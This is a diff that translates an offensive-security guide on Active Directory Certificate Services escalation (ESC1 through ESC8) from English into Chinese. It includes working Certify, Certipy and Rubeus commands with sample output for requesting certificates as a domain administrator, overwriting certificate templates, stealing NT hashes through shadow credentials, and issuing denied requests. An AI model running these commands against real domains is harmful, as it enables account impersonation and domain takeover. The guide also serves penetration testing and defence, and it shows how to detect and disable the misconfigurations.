-  - The Active Directory (AD) prioritizes the subjectAltName (SAN) in a certificate for identity verification if present. This means that by specifying the SAN in a CSR, a certificate can be requested to impersonate any user (e.g., a domain administrator). Whether a SAN can be specified by the requester is indicated in the certificate template's AD object through the `mspki-certificate-name-flag` property. This property is a bitmask, and the presence of the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag permits the specification of the SAN by the requester.
+- **企业 CA 授予低权限用户注册权限。**
+- **不需要经理批准。**
+- **不需要授权人员的签名。**
+- **证书模板上的安全描述符过于宽松，允许低权限用户获得注册权限。**
+- **证书模板被配置为定义促进身份验证的 EKU：**
+- 包含客户端身份验证 (OID 1.3.6.1.5.5.7.3.2)、PKINIT 客户端身份验证 (1.3.6.1.5.2.3.4)、智能卡登录 (OID 1.3.6.1.4.1.311.20.2.2)、任何目的 (OID 2.5.29.37.0) 或无 EKU (SubCA) 的扩展密钥使用 (EKU) 标识符。
+- **模板允许请求者在证书签名请求 (CSR) 中包含 subjectAltName：**
+- 如果存在，Active Directory (AD) 在证书中优先考虑 subjectAltName (SAN) 进行身份验证。这意味着通过在 CSR 中指定 SAN，可以请求证书以冒充任何用户（例如，域管理员）。请求者是否可以指定 SAN 在证书模板的 AD 对象中通过 `mspki-certificate-name-flag` 属性指示。该属性是一个位掩码，`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 标志的存在允许请求者指定 SAN。
 
 > [!CAUTION]
-> The configuration outlined permits low-privileged users to request certificates with any SAN of choice, enabling authentication as any domain principal through Kerberos or SChannel.
+> 上述配置允许低权限用户请求具有任何选择的 SAN 的证书，从而通过 Kerberos 或 SChannel 以任何域主体的身份进行身份验证。
 
-This feature is sometimes enabled to support the on-the-fly generation of HTTPS or host certificates by products or deployment services, or due to a lack of understanding.
+此功能有时被启用以支持产品或部署服务的 HTTPS 或主机证书的即时生成，或由于缺乏理解。
 
-It is noted that creating a certificate with this option triggers a warning, which is not the case when an existing certificate template (such as the `WebServer` template, which has `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` enabled) is duplicated and then modified to include an authentication OID.
+需要注意的是，使用此选项创建证书会触发警告，而当复制现有证书模板（例如，启用了 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 的 `WebServer` 模板）并修改以包含身份验证 OID 时则不会。
 
-### Abuse
-
-To **find vulnerable certificate templates** you can run:
+### 滥用
 
+要**查找易受攻击的证书模板**，您可以运行：
 ```bash
 Certify.exe find /vulnerable
 certipy find -username john@corp.local -password Passw0rd -dc-ip 172.16.126.128
 ```
-
-To **abuse this vulnerability to impersonate an administrator** one could run:
-
+要**利用此漏洞冒充管理员**，可以运行：
 ```bash
 Certify.exe request /ca:dc.domain.local-DC-CA /template:VulnTemplate /altname:localadmin
 certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
 ```
-
-Then you can transform the generated **certificate to `.pfx`** format and use it to **authenticate using Rubeus or certipy** again:
-
+然后您可以将生成的 **证书转换为 `.pfx`** 格式，并再次使用 **Rubeus 或 certipy** 进行 **身份验证**：
 ```bash
 Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
 certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 172.16.19.100
 ```
+Windows二进制文件 "Certreq.exe" 和 "Certutil.exe" 可用于生成 PFX: https://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee
 
-The Windows binaries "Certreq.exe" & "Certutil.exe" can be used to generate the PFX: https://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee
-
-The enumeration of certificate templates within the AD Forest's configuration schema, specifically those not necessitating approval or signatures, possessing a Client Authentication or Smart Card Logon EKU, and with the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag enabled, can be performed by running the following LDAP query:
-
+可以通过运行以下 LDAP 查询来枚举 AD Forest 配置架构中的证书模板，特别是那些不需要批准或签名、具有客户端身份验证或智能卡登录 EKU，并且启用了 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 标志的模板:
 ```
 (&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4)(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificate-name-flag:1.2.840.113556.1.4.804:=1))
 ```
-
 ## Misconfigured Certificate Templates - ESC2
 
 ### Explanation
 
-The second abuse scenario is a variation of the first one:
+第二个滥用场景是第一个场景的变体：
 
-1. Enrollment rights are granted to low-privileged users by the Enterprise CA.
-2. The requirement for manager approval is disabled.
-3. The need for authorized signatures is omitted.
-4. An overly permissive security descriptor on the certificate template grants certificate enrollment rights to low-privileged users.
-5. **The certificate template is defined to include the Any Purpose EKU or no EKU.**
+1. 企业 CA 授予低权限用户注册权限。
+2. 禁用经理批准的要求。
+3. 省略授权签名的需要。
+4. 证书模板上的安全描述符过于宽松，授予低权限用户证书注册权限。
+5. **证书模板被定义为包含任何目的 EKU 或没有 EKU。**
 
-The **Any Purpose EKU** permits a certificate to be obtained by an attacker for **any purpose**, including client authentication, server authentication, code signing, etc. The same **technique used for ESC3** can be employed to exploit this scenario.
+**任何目的 EKU** 允许攻击者以 **任何目的** 获取证书，包括客户端身份验证、服务器身份验证、代码签名等。可以使用与 **ESC3** 相同的 **技术** 来利用此场景。
 
-Certificates with **no EKUs**, which act as subordinate CA certificates, can be exploited for **any purpose** and can **also be used to sign new certificates**. Hence, an attacker could specify arbitrary EKUs or fields in the new certificates by utilizing a subordinate CA certificate.
+具有 **无 EKU** 的证书，作为下级 CA 证书，可以被利用于 **任何目的**，并且 **也可以用于签署新证书**。因此，攻击者可以通过利用下级 CA 证书指定任意 EKU 或字段在新证书中。
 
-However, new certificates created for **domain authentication** will not function if the subordinate CA is not trusted by the **`NTAuthCertificates`** object, which is the default setting. Nonetheless, an attacker can still create **new certificates with any EKU** and arbitrary certificate values. These could be potentially **abused** for a wide range of purposes (e.g., code signing, server authentication, etc.) and could have significant implications for other applications in the network like SAML, AD FS, or IPSec.
-
-To enumerate templates that match this scenario within the AD Forest’s configuration schema, the following LDAP query can be run:
+然而，如果下级 CA 未被 **`NTAuthCertificates`** 对象信任，则为 **域身份验证** 创建的新证书将无法正常工作，这是默认设置。尽管如此，攻击者仍然可以创建 **具有任何 EKU** 和任意证书值的新证书。这些证书可能会被 **滥用** 用于广泛的目的（例如，代码签名、服务器身份验证等），并可能对网络中其他应用程序（如 SAML、AD FS 或 IPSec）产生重大影响。
 
+要枚举与此场景匹配的模板，可以运行以下 LDAP 查询：
 ```
 (&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))
 ```
+## 配置错误的注册代理模板 - ESC3
 
-## Misconfigured Enrolment Agent Templates - ESC3
+### 解释
 
-### Explanation
+这个场景与第一个和第二个场景类似，但**利用**了**不同的 EKU**（证书请求代理）和**两个不同的模板**（因此有两组要求），
 
-This scenario is like the first and second one but **abusing** a **different EKU** (Certificate Request Agent) and **2 different templates** (therefore it has 2 sets of requirements),
+**证书请求代理 EKU**（OID 1.3.6.1.4.1.311.20.2.1），在微软文档中称为**注册代理**，允许一个主体**代表另一个用户**进行**证书注册**。
 
-The **Certificate Request Agent EKU** (OID 1.3.6.1.4.1.311.20.2.1), known as **Enrollment Agent** in Microsoft documentation, allows a principal to **enroll** for a **certificate** on **behalf of another user**.
+**“注册代理”**在这样的**模板**中注册，并使用生成的**证书代表其他用户共同签署 CSR**。然后，它将**共同签署的 CSR**发送给 CA，注册一个**允许“代表注册”的模板**，CA 随后返回一个**属于“其他”用户的证书**。
 
-The **“enrollment agent”** enrolls in such a **template** and uses the resulting **certificate to co-sign a CSR on behalf of the other user**. It then **sends** the **co-signed CSR** to the CA, enrolling in a **template** that **permits “enroll on behalf of”**, and the CA responds with a **certificate belong to the “other” user**.
+**要求 1：**
 
-**Requirements 1:**
+- 企业 CA 授予低权限用户注册权。
+- 省略了经理批准的要求。
+- 没有授权签名的要求。
+- 证书模板的安全描述符过于宽松，授予低权限用户注册权。
+- 证书模板包括证书请求代理 EKU，允许代表其他主体请求其他证书模板。
 
-- Enrollment rights are granted to low-privileged users by the Enterprise CA.
-- The requirement for manager approval is omitted.
-- No requirement for authorized signatures.
-- The security descriptor of the certificate template is excessively permissive, granting enrollment rights to low-privileged users.
-- The certificate template includes the Certificate Request Agent EKU, enabling the request of other certificate templates on behalf of other principals.
+**要求 2：**
 
-**Requirements 2:**
+- 企业 CA 授予低权限用户注册权。
+- 经理批准被绕过。
+- 模板的架构版本为 1 或超过 2，并指定了需要证书请求代理 EKU 的应用程序策略发行要求。
+- 证书模板中定义的 EKU 允许域身份验证。
+- CA 上未对注册代理应用限制。
 
-- The Enterprise CA grants enrollment rights to low-privileged users.
-- Manager approval is bypassed.
-- The template's schema version is either 1 or exceeds 2, and it specifies an Application Policy Issuance Requirement that necessitates the Certificate Request Agent EKU.
-- An EKU defined in the certificate template permits domain authentication.
-- Restrictions for enrollment agents are not applied on the CA.
-
-### Abuse
-
-You can use [**Certify**](https://github.com/GhostPack/Certify) or [**Certipy**](https://github.com/ly4k/Certipy) to abuse this scenario:
+### 滥用
 
+您可以使用 [**Certify**](https://github.com/GhostPack/Certify) 或 [**Certipy**](https://github.com/ly4k/Certipy) 来滥用此场景：
 ```bash
 # Request an enrollment agent certificate
 Certify.exe request /ca:DC01.DOMAIN.LOCAL\DOMAIN-CA /template:Vuln-EnrollmentAgent
@@ -132,43 +121,39 @@ certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.loca
 # Use Rubeus with the certificate to authenticate as the other user
 Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
 ```
+允许**获取**注册代理证书的**用户**、注册**代理**被允许注册的模板以及注册代理可以代表其行动的**帐户**可以通过企业CA进行限制。这是通过打开`certsrc.msc` **管理单元**，**右键单击CA**，**单击属性**，然后**导航**到“注册代理”选项卡来实现的。
 
-The **users** who are allowed to **obtain** an **enrollment agent certificate**, the templates in which enrollment **agents** are permitted to enroll, and the **accounts** on behalf of which the enrollment agent may act can be constrained by enterprise CAs. This is achieved by opening the `certsrc.msc` **snap-in**, **right-clicking on the CA**, **clicking Properties**, and then **navigating** to the “Enrollment Agents” tab.
+然而，值得注意的是，CA的**默认**设置是“**不限制注册代理**。”当管理员启用对注册代理的限制，将其设置为“限制注册代理”时，默认配置仍然非常宽松。它允许**所有人**以任何人的身份访问所有模板进行注册。
 
-However, it is noted that the **default** setting for CAs is to “**Do not restrict enrollment agents**.” When the restriction on enrollment agents is enabled by administrators, setting it to “Restrict enrollment agents,” the default configuration remains extremely permissive. It allows **Everyone** access to enroll in all templates as anyone.
+## 脆弱的证书模板访问控制 - ESC4
 
-## Vulnerable Certificate Template Access Control - ESC4
+### **解释**
 
-### **Explanation**
+**证书模板**上的**安全描述符**定义了特定**AD主体**对模板所拥有的**权限**。
 
-The **security descriptor** on **certificate templates** defines the **permissions** specific **AD principals** possess concerning the template.
+如果**攻击者**拥有必要的**权限**来**更改**模板并**建立**任何在**前面部分**中概述的**可利用的错误配置**，则可能会促进特权升级。
 
-Should an **attacker** possess the requisite **permissions** to **alter** a **template** and **institute** any **exploitable misconfigurations** outlined in **prior sections**, privilege escalation could be facilitated.
+适用于证书模板的显著权限包括：
 
-Notable permissions applicable to certificate templates include:
+- **所有者：**隐式控制对象，允许修改任何属性。
+- **完全控制：**对对象拥有完全权限，包括更改任何属性的能力。
+- **写所有者：**允许将对象的所有者更改为攻击者控制的主体。
+- **写Dacl：**允许调整访问控制，可能授予攻击者完全控制权限。
+- **写属性：**授权编辑任何对象属性。
 
-- **Owner:** Grants implicit control over the object, allowing for the modification of any attributes.
-- **FullControl:** Enables complete authority over the object, including the capability to alter any attributes.
-- **WriteOwner:** Permits the alteration of the object's owner to a principal under the attacker's control.
-- **WriteDacl:** Allows for the adjustment of access controls, potentially granting an attacker FullControl.
-- **WriteProperty:** Authorizes the editing of any object properties.
+### 滥用
 
-### Abuse
-
-An example of a privesc like the previous one:
+一个类似于之前的特权升级的例子：
 
 <figure><img src="../../../images/image (814).png" alt=""><figcaption></figcaption></figure>
 
-ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.
-
-As we can see in the path above, only `JOHNPC` has these privileges, but our user `JOHN` has the new `AddKeyCredentialLink` edge to `JOHNPC`. Since this technique is related to certificates, I have implemented this attack as well, which is known as [Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab). Here’s a little sneak peak of Certipy’s `shadow auto` command to retrieve the NT hash of the victim.
+ESC4是指用户对证书模板具有写权限。这可以被滥用，例如覆盖证书模板的配置，使模板易受ESC1攻击。
 
+正如我们在上面的路径中看到的，只有`JOHNPC`拥有这些权限，但我们的用户`JOHN`对`JOHNPC`有新的`AddKeyCredentialLink`边缘。由于此技术与证书相关，我也实现了这种攻击，称为[Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)。这是Certipy的`shadow auto`命令的一个小预览，用于检索受害者的NT哈希。
 ```bash
 certipy shadow auto 'corp.local/john:Passw0rd!@dc.corp.local' -account 'johnpc'
 ```
-
-**Certipy** can overwrite the configuration of a certificate template with a single command. By **default**, Certipy will **overwrite** the configuration to make it **vulnerable to ESC1**. We can also specify the **`-save-old` parameter to save the old configuration**, which will be useful for **restoring** the configuration after our attack.
-
+**Certipy** 可以通过一个命令覆盖证书模板的配置。默认情况下，Certipy 将覆盖配置，使其对 ESC1 **易受攻击**。我们还可以指定 **`-save-old` 参数以保存旧配置**，这在我们攻击后 **恢复** 配置时将非常有用。
 ```bash
 # Make template vuln to ESC1
 certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -save-old
@@ -179,43 +164,37 @@ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target
 # Restore config
 certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -configuration ESC4-Test.json
 ```
+## 脆弱的 PKI 对象访问控制 - ESC5
 
-## Vulnerable PKI Object Access Control - ESC5
+### 解释
 
-### Explanation
+广泛的基于 ACL 的互联关系网络，包括多个超出证书模板和证书颁发机构的对象，可能会影响整个 AD CS 系统的安全性。这些对象可能显著影响安全性，包括：
 
-The extensive web of interconnected ACL-based relationships, which includes several objects beyond certificate templates and the certificate authority, can impact the security of the entire AD CS system. These objects, which can significantly affect security, encompass:
+- CA 服务器的 AD 计算机对象，可能通过 S4U2Self 或 S4U2Proxy 等机制被攻陷。
+- CA 服务器的 RPC/DCOM 服务器。
+- 在特定容器路径 `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>` 内的任何后代 AD 对象或容器。该路径包括但不限于容器和对象，如证书模板容器、认证机构容器、NTAuthCertificates 对象和注册服务容器。
 
-- The AD computer object of the CA server, which may be compromised through mechanisms like S4U2Self or S4U2Proxy.
-- The RPC/DCOM server of the CA server.
-- Any descendant AD object or container within the specific container path `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`. This path includes, but is not limited to, containers and objects such as the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, and the Enrollment Services Container.
-
-The security of the PKI system can be compromised if a low-privileged attacker manages to gain control over any of these critical components.
+如果低权限攻击者设法控制这些关键组件中的任何一个，PKI 系统的安全性可能会受到威胁。
 
 ## EDITF_ATTRIBUTESUBJECTALTNAME2 - ESC6
 
-### Explanation
+### 解释
 
-The subject discussed in the [**CQure Academy post**](https://cqureacademy.com/blog/enhanced-key-usage) also touches on the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** flag's implications, as outlined by Microsoft. This configuration, when activated on a Certification Authority (CA), permits the inclusion of **user-defined values** in the **subject alternative name** for **any request**, including those constructed from Active Directory®. Consequently, this provision allows an **intruder** to enroll through **any template** set up for domain **authentication**—specifically those open to **unprivileged** user enrollment, like the standard User template. As a result, a certificate can be secured, enabling the intruder to authenticate as a domain administrator or **any other active entity** within the domain.
+在 [**CQure Academy 文章**](https://cqureacademy.com/blog/enhanced-key-usage) 中讨论的主题也涉及 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 标志的影响，如微软所述。当在证书颁发机构 (CA) 上激活此配置时，允许在 **任何请求** 的 **主题备用名称** 中包含 **用户定义的值**，包括那些由 Active Directory® 构建的请求。因此，这一条款允许 **入侵者** 通过为域 **身份验证** 设置的 **任何模板** 进行注册——特别是那些对 **无特权** 用户注册开放的模板，如标准用户模板。结果，证书可以被获取，使入侵者能够以域管理员或 **域内任何其他活动实体** 的身份进行身份验证。
 
-**Note**: The approach for appending **alternative names** into a Certificate Signing Request (CSR), through the `-attrib "SAN:"` argument in `certreq.exe` (referred to as “Name Value Pairs”), presents a **contrast** from the exploitation strategy of SANs in ESC1. Here, the distinction lies in **how account information is encapsulated**—within a certificate attribute, rather than an extension.
+**注意**：通过 `certreq.exe` 中的 `-attrib "SAN:"` 参数将 **备用名称** 附加到证书签名请求 (CSR) 的方法（称为“名称值对”）与 ESC1 中 SAN 的利用策略存在 **对比**。在这里，区别在于 **账户信息的封装方式**——在证书属性中，而不是扩展中。
 
-### Abuse
-
-To verify whether the setting is activated, organizations can utilize the following command with `certutil.exe`:
+### 滥用
 
+要验证设置是否已激活，组织可以使用以下命令与 `certutil.exe`：
 ```bash
 certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
 ```
-
-This operation essentially employs **remote registry access**, hence, an alternative approach might be:
-
+此操作本质上使用 **远程注册表访问**，因此，另一种方法可能是：
 ```bash
 reg.exe query \\<CA_SERVER>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA_NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\ /v EditFlags
 ```
-
-Tools like [**Certify**](https://github.com/GhostPack/Certify) and [**Certipy**](https://github.com/ly4k/Certipy) are capable of detecting this misconfiguration and exploiting it:
-
+像 [**Certify**](https://github.com/GhostPack/Certify) 和 [**Certipy**](https://github.com/ly4k/Certipy) 这样的工具能够检测到这种错误配置并加以利用：
 ```bash
 # Detect vulnerabilities, including this one
 Certify.exe find
@@ -224,47 +203,39 @@ Certify.exe find
 Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:User /altname:localadmin
 certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template User -upn administrator@corp.local
 ```
-
-To alter these settings, assuming one possesses **domain administrative** rights or equivalent, the following command can be executed from any workstation:
-
+要更改这些设置，假设拥有**域管理员**权限或同等权限，可以从任何工作站执行以下命令：
 ```bash
 certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
-
-To disable this configuration in your environment, the flag can be removed with:
-
+要在您的环境中禁用此配置，可以使用以下命令移除标志：
 ```bash
 certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
-
 > [!WARNING]
-> Post the May 2022 security updates, newly issued **certificates** will contain a **security extension** that incorporates the **requester's `objectSid` property**. For ESC1, this SID is derived from the specified SAN. However, for **ESC6**, the SID mirrors the **requester's `objectSid`**, not the SAN.\
-> To exploit ESC6, it is essential for the system to be susceptible to ESC10 (Weak Certificate Mappings), which prioritizes the **SAN over the new security extension**.
+> 在2022年5月的安全更新之后，新颁发的**证书**将包含一个**安全扩展**，该扩展包含**请求者的`objectSid`属性**。对于ESC1，此SID源自指定的SAN。然而，对于**ESC6**，SID反映**请求者的`objectSid`**，而不是SAN。\
+> 要利用ESC6，系统必须易受ESC10（弱证书映射）的影响，该漏洞优先考虑**SAN而不是新的安全扩展**。
 
-## Vulnerable Certificate Authority Access Control - ESC7
+## 易受攻击的证书颁发机构访问控制 - ESC7
 
-### Attack 1
+### 攻击 1
 
-#### Explanation
-
-Access control for a certificate authority is maintained through a set of permissions that govern CA actions. These permissions can be viewed by accessing `certsrv.msc`, right-clicking a CA, selecting properties, and then navigating to the Security tab. Additionally, permissions can be enumerated using the PSPKI module with commands such as:
+#### 解释
 
+证书颁发机构的访问控制通过一组权限来维护，这些权限管理CA的操作。可以通过访问`certsrv.msc`，右键单击CA，选择属性，然后导航到安全选项卡来查看这些权限。此外，可以使用PSPKI模块和以下命令枚举权限：
 ```bash
 Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
 ```
+这提供了主要权限的见解，即 **`ManageCA`** 和 **`ManageCertificates`**，分别与“CA 管理员”和“证书管理员”的角色相关。
 
-This provides insights into the primary rights, namely **`ManageCA`** and **`ManageCertificates`**, correlating to the roles of “CA administrator” and “Certificate Manager” respectively.
+#### 滥用
 
-#### Abuse
+在证书颁发机构拥有 **`ManageCA`** 权限使得主体能够使用 PSPKI 远程操控设置。这包括切换 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 标志，以允许在任何模板中指定 SAN，这是域提升的关键方面。
 
-Having **`ManageCA`** rights on a certificate authority enables the principal to manipulate settings remotely using PSPKI. This includes toggling the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** flag to permit SAN specification in any template, a critical aspect of domain escalation.
+通过使用 PSPKI 的 **Enable-PolicyModuleFlag** cmdlet，可以简化此过程，允许在不直接与 GUI 交互的情况下进行修改。
 
-Simplification of this process is achievable through the use of PSPKI’s **Enable-PolicyModuleFlag** cmdlet, allowing modifications without direct GUI interaction.
-
-Possession of **`ManageCertificates`** rights facilitates the approval of pending requests, effectively circumventing the "CA certificate manager approval" safeguard.
-
-A combination of **Certify** and **PSPKI** modules can be utilized to request, approve, and download a certificate:
+拥有 **`ManageCertificates`** 权限可以批准待处理的请求，有效地绕过“CA 证书管理员批准”保护。
 
+可以结合 **Certify** 和 **PSPKI** 模块来请求、批准和下载证书：
 ```powershell
 # Request a certificate that will require an approval
 Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:ApprovalNeeded
@@ -280,37 +251,33 @@ Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -R
 # Download the certificate
 Certify.exe download /ca:dc.domain.local\theshire-DC-CA /id:336
 ```
+### 攻击 2
 
-### Attack 2
-
-#### Explanation
+#### 解释
 
 > [!WARNING]
-> In the **previous attack** **`Manage CA`** permissions were used to **enable** the **EDITF_ATTRIBUTESUBJECTALTNAME2** flag to perform the **ESC6 attack**, but this will not have any effect until the CA service (`CertSvc`) is restarted. When a user has the `Manage CA` access right, the user is also allowed to **restart the service**. However, it **does not mean that the user can restart the service remotely**. Furthermore, E**SC6 might not work out of the box** in most patched environments due to the May 2022 security updates.
+> 在**之前的攻击**中，**`Manage CA`** 权限被用来**启用** **EDITF_ATTRIBUTESUBJECTALTNAME2** 标志以执行 **ESC6 攻击**，但这在 CA 服务（`CertSvc`）重启之前不会产生任何效果。当用户拥有 `Manage CA` 访问权限时，该用户也被允许**重启服务**。然而，这**并不意味着用户可以远程重启服务**。此外，由于 2022 年 5 月的安全更新，**ESC6 可能在大多数已修补的环境中无法正常工作**。
 
-Therefore, another attack is presented here.
+因此，这里提出了另一个攻击。
 
-Perquisites:
+前提条件：
 
-- Only **`ManageCA` permission**
-- **`Manage Certificates`** permission (can be granted from **`ManageCA`**)
-- Certificate template **`SubCA`** must be **enabled** (can be enabled from **`ManageCA`**)
+- 仅需 **`ManageCA` 权限**
+- **`Manage Certificates`** 权限（可以从 **`ManageCA`** 授予）
+- 证书模板 **`SubCA`** 必须**启用**（可以从 **`ManageCA`** 启用）
 
-The technique relies on the fact that users with the `Manage CA` _and_ `Manage Certificates` access right can **issue failed certificate requests**. The **`SubCA`** certificate template is **vulnerable to ESC1**, but **only administrators** can enroll in the template. Thus, a **user** can **request** to enroll in the **`SubCA`** - which will be **denied** - but **then issued by the manager afterwards**.
+该技术依赖于拥有 `Manage CA` _和_ `Manage Certificates` 访问权限的用户可以**发出失败的证书请求**。**`SubCA`** 证书模板**易受 ESC1 攻击**，但**只有管理员**可以注册该模板。因此，**用户**可以**请求**注册 **`SubCA`** - 这将被**拒绝** - 但**随后由管理员发放**。
 
-#### Abuse
-
-You can **grant yourself the `Manage Certificates`** access right by adding your user as a new officer.
+#### 滥用
 
+您可以通过将您的用户添加为新官员来**授予自己 `Manage Certificates`** 访问权限。
 ```bash
 certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
 
 [*] Successfully added officer 'John' on 'corp-DC-CA'
 ```
-
-The **`SubCA`** template can be **enabled on the CA** with the `-enable-template` parameter. By default, the `SubCA` template is enabled.
-
+**`SubCA`** 模板可以通过 `-enable-template` 参数在 CA 上 **启用**。默认情况下，`SubCA` 模板是启用的。
 ```bash
 # List templates
 certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
@@ -322,11 +289,9 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 
 [*] Successfully enabled 'SubCA' on 'corp-DC-CA'
 ```
+如果我们满足了此攻击的先决条件，我们可以开始**请求基于 `SubCA` 模板的证书**。
 
-If we have fulfilled the prerequisites for this attack, we can start by **requesting a certificate based on the `SubCA` template**.
-
-**This request will be denie**d, but we will save the private key and note down the request ID.
-
+**此请求将被拒绝**，但我们将保存私钥并记录请求 ID。
 ```bash
 certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
@@ -338,18 +303,14 @@ Would you like to save the private key? (y/N) y
 [*] Saved private key to 785.key
 [-] Failed to request certificate
 ```
-
-With our **`Manage CA` and `Manage Certificates`**, we can then **issue the failed certificate** request with the `ca` command and the `-issue-request <request ID>` parameter.
-
+通过我们的 **`Manage CA` 和 `Manage Certificates`**，我们可以使用 `ca` 命令和 `-issue-request <request ID>` 参数 **签发失败的证书** 请求。
 ```bash
 certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
 
 [*] Successfully issued certificate
 ```
-
-And finally, we can **retrieve the issued certificate** with the `req` command and the `-retrieve <request ID>` parameter.
-
+最后，我们可以使用 `req` 命令和 `-retrieve <request ID>` 参数 **检索已发放的证书**。
 ```bash
 certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
@@ -361,60 +322,52 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 [*] Loaded private key from '785.key'
 [*] Saved certificate and private key to 'administrator.pfx'
 ```
-
 ## NTLM Relay to AD CS HTTP Endpoints – ESC8
 
-### Explanation
+### 解释
 
 > [!NOTE]
-> In environments where **AD CS is installed**, if a **web enrollment endpoint vulnerable** exists and at least one **certificate template is published** that permits **domain computer enrollment and client authentication** (such as the default **`Machine`** template), it becomes possible for **any computer with the spooler service active to be compromised by an attacker**!
+> 在**安装了 AD CS**的环境中，如果存在**易受攻击的 web 注册端点**并且至少发布了一个**允许域计算机注册和客户端身份验证的证书模板**（例如默认的**`Machine`**模板），那么**任何具有活动的打印后台处理程序服务的计算机都可能被攻击者攻陷**！
 
-Several **HTTP-based enrollment methods** are supported by AD CS, made available through additional server roles that administrators may install. These interfaces for HTTP-based certificate enrollment are susceptible to **NTLM relay attacks**. An attacker, from a **compromised machine, can impersonate any AD account that authenticates via inbound NTLM**. While impersonating the victim account, these web interfaces can be accessed by an attacker to **request a client authentication certificate using the `User` or `Machine` certificate templates**.
+AD CS 支持几种**基于 HTTP 的注册方法**，这些方法通过管理员可以安装的额外服务器角色提供。这些用于基于 HTTP 的证书注册的接口易受**NTLM 中继攻击**。攻击者可以从**被攻陷的机器上，冒充任何通过入站 NTLM 进行身份验证的 AD 账户**。在冒充受害者账户的同时，攻击者可以访问这些 web 接口，以**使用 `User` 或 `Machine` 证书模板请求客户端身份验证证书**。
 
-- The **web enrollment interface** (an older ASP application available at `http://<caserver>/certsrv/`), defaults to HTTP only, which does not offer protection against NTLM relay attacks. Additionally, it explicitly permits only NTLM authentication through its Authorization HTTP header, rendering more secure authentication methods like Kerberos inapplicable.
-- The **Certificate Enrollment Service** (CES), **Certificate Enrollment Policy** (CEP) Web Service, and **Network Device Enrollment Service** (NDES) by default support negotiate authentication via their Authorization HTTP header. Negotiate authentication **supports both** Kerberos and **NTLM**, allowing an attacker to **downgrade to NTLM** authentication during relay attacks. Although these web services enable HTTPS by default, HTTPS alone **does not safeguard against NTLM relay attacks**. Protection from NTLM relay attacks for HTTPS services is only possible when HTTPS is combined with channel binding. Regrettably, AD CS does not activate Extended Protection for Authentication on IIS, which is required for channel binding.
+- **web 注册接口**（一个可在 `http://<caserver>/certsrv/` 访问的旧 ASP 应用程序）默认仅支持 HTTP，这并不提供对 NTLM 中继攻击的保护。此外，它明确仅通过其授权 HTTP 头允许 NTLM 身份验证，使得更安全的身份验证方法如 Kerberos 不适用。
